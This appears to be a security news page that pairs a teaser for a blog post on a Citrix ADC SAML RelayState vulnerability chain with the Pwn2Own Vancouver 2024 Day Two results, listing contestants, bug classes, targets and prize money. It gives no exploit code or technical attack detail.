Citrix ADC – Unexpected Treasure

Reading Time: 10 minutes  TL;DR Setting secure rules for the RelayState parameter is a MUST when configuring Citrix Application Delivery Controller (ADC) and Citrix Gateway as SAML Service Provider, because an attacker can exploit a chain of three low-risk vulnerabilities to compromise victims’ accounts. By luring users to a malicious domain, attackers can steal session cookies and gain unauthorized […]

Pwn2Own Vancouver 2024 - Day Two Results

Welcome to the second and final day of Pwn2Own Vancouver 2024! We saw some amazing research yesterday, including a Tesla exploit and a single exploit hitting both Chrome and Edge. So far, we have paid out $723,500 for the event, and we’re poised to hit $1,000,000 again. Today looks to be just as exciting, with more attempts in virtualization, browser sandbox escapes, and Pwn2Own’s first-ever Docker escape, so stay tuned for all of the results!


And that’s a wrap! Pwn2Own Vancouver 2024 has come to a close. In total, we awarded $1,132,500 for 29 unique 0-days. We’re also happy to award Manfred Paul with the title of Master of Pwn. He won $202,500 and 25 points total. Combining the last three events (Toronto, Automotive, and Vancouver), we’ve awarded $3,494,750 for this year’s Pwn2Own events. Here’s how the Top 10 of this event added up:

Congratulations to all the winners. We couldn’t hold this event without the hard work of the contestants. And thanks to the vendors as well. They now have 90 days to fix these vulnerabilities. Special thanks to Tesla for their sponsorship and support. For details of each of today’s exploits, see the entries below.


SUCCESS - Marcin Wiązowski used an improper input validation bug to escalate privileges on Windows 11. He earns $15,000 and 3 Master of Pwn points.

SUCCESS - STAR Labs SG's exploit of VMware Workstation used two bugs. One is an uninitialized variable, but the other was previously known. They still win $30,000 and 6 Master of Pwn points.

SUCCESS - ColdEye used two bugs, including a UAF, to exploit Oracle VirtualBox. He even managed to leave the guest OS intact. His guest-to-host escape earns him $20,000 and 4 Master of Pwn points.

SUCCESS - Manfred Paul (@_manfp) used an OOB Write for the RCE and an exposed dangerous function bug to achieve his sandbox escape of Mozilla Firefox. He earns another $100,000 and 10 Master of Pwn points, which puts him in the lead with 25.

SUCCESS - First-time Pwn2Own contestant Gabriel Kirkpatrick (gabe_k of exploits.forsale) used an always tricky race condition to escalate privileges on Windows 11. He earns $15,000 and 3 Master of Pwn points.

SUCCESS - Edouard Bochin (@le_douds) and Tao Yan (@Ga1ois) from Palo Alto Networks used an OOB Read plus a novel technique for defeating V8 hardening to get arbitrary code execution in the renderer. They were able to exploit Chrome and Edge with the same bugs, earning $42,500 and 9 Master of Pwn points.

BUG COLLISION - STAR Labs SG successfully demonstrated their privilege escalation on Ubuntu desktop. However, they used a bug that was previously reported. They still earn $5,000 and 1 Master of Pwn point.

BUG COLLISION - Although the Hackinside Team was able to escalate privileges on Windows 11 through an integer underflow, the bug was known by the vendor. They still earn $7,500 and 1.5 Master of Pwn points.

SUCCESS - Seunghyun Lee (@0x10n) of KAIST Hacking Lab used a UAF to RCE in the renderer on both Microsoft Edge and Google Chrome. He earns $85,000 and 9 Master of Pwn points. That brings his contest total to $145,000 and 15 Master of Pwn points.

SUCCESS - The first Docker desktop escape at Pwn2Own involved two bugs, including a UAF. The team from STAR Labs SG did great work in the demonstration and earned $60,000 and 6 Master of Pwn points.

SUCCESS - Valentina Palmiotti (@chompie1337) with IBM X-Force used an Improper Update of Reference Count bug to escalate privileges on Windows 11. She nailed her first Pwn2Own event and walks away with $15,000 and 3 Master of Pwn points.

BUG COLLISION - The final entry of Pwn2Own Vancouver 2024 ends as a collision, as Theori used a bug that was previously known to escalate privileges on Ubuntu desktop. They still win $5,000 and 1 Master of Pwn point.
